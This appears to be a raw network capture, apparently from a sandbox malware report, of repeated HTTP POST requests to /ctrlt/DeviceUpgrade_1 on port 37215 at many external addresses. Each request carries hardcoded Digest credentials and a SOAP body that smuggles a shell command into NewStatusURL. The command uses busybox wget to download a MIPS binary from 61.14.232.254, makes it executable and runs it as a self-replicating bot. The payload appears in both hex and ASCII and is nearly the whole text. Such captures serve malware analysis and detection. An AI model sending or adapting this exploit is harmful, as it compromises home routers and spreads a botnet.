                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1210192.168.2.1347606197.175.34.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.523927927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1211192.168.2.1350316197.103.113.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.523933887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1212192.168.2.1349378197.33.141.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.523961067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1213192.168.2.1349846197.222.44.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.523988008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1214192.168.2.1340104177.101.184.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.524012089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1215192.168.2.135330441.54.72.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.524039984 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1216192.168.2.134831641.210.43.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.524393082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1217192.168.2.1357382157.187.237.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.524415016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1218192.168.2.133513241.181.203.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.524435043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1219192.168.2.1350392157.207.76.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.524466991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 